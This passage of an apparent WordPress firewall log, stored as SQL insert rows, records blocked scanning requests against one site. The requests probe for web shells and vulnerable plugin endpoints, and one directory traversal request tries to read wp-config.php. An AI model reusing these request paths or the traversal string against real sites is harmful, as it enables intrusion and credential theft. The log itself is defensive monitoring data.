User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvdXBsb2FkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12025,1674828780.396021,1674828780.284800,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYTU3YnplODkzMS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12026,1674828776.669313,1674828776.510400,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12027,1674828774.206705,1674828774.055800,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-engine-module/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lbmdpbmUtbW9kdWxlL2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12028,1674828771.528254,1674828771.405200,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-engine-module/wp-engine.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lbmdpbmUtbW9kdWxlL3dwLWVuZ2luZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12029,1674828769.228216,1674828769.077000,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12030,1674828766.238732,1674828766.121700,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12031,1674828763.898959,1674828763.769400,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimizations/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9ucy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12032,1674828756.274786,1674828756.164600,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9ucy9JT3B0aW1pemVzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12033,1674828754.218044,1674828754.103700,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12034,1674828752.075143,1674828751.908900,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9zYXZlcG5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12035,1674829264.741027,1674829264.619800,'\0\0\0\0\0\0\0\0\0\0���+�\Z',0,403,0,0,0,'https://dailyjolly.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Go-http-client/1.1','blocked:waf','Directory Traversal (Requesting wp-config.php)','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"traversal\",\"ssl\":1}'),(12036,1674828830.430138,1674828830.308500,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXItcHJvL2xpYi9waHAvY29ubmVjdG9yLm1pbmltYWwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12037,1674828827.062684,1674828826.949200,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12038,1674828824.978277,1674828824.858300,'\0\0\0\0\0\0\0\0\0\0��g��3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php?action=_ning_upload_image',NULL,'python-requests/2.28.1','blocked:waf','Adning Advertising <= 1.5.5 - Arbitrary File Upload and Arbitrary File Deletion','{\"learningMode\":0,\"failedRules\":\"260\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"Ly9ob21lL2RhaWx5am9sbHkuY28udWsvcHVibGljX2h0bWwvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(12039,1674832657.038314,1674832656.905700,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/sid/sidwso.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaWQvc2lkd3NvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12040,1674832649.813288,1674832649.674200,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/bala.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2JhbGEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12041,1674832637.560436,1674832637.431400,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/wso112233.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvd3NvMTEyMjMzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12042,1674832633.235986,1674832633.108700,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso112233.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dzbzExMjIzMy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12043,1674832681.984265,1674832681.846200,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/xleet-shell.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3hsZWV0LXNoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12044,1674832674.554613,1674832674.414000,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet-shell.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsZWV0LXNoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12045,1674832670.820546,1674832670.665800,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12046,1674832661.831580,1674832661.708600,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/shell20211028.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvc2hlbGwyMDIxMTAyOC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12047,1674833221.497864,1674833221.348600,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/wso112233.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvd3NvMTEyMjMzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12048,1674833217.441671,1674833217.314200,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso112233.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dzbzExMjIzMy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12049,1674833252.493146,1674833252.363700,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/xleet-shell.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3hsZWV0LXNoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12050,1674833249.241333,1674833249.126600,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet-shell.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsZWV0LXNoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12051,1674833245.518370,1674833245.387800,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 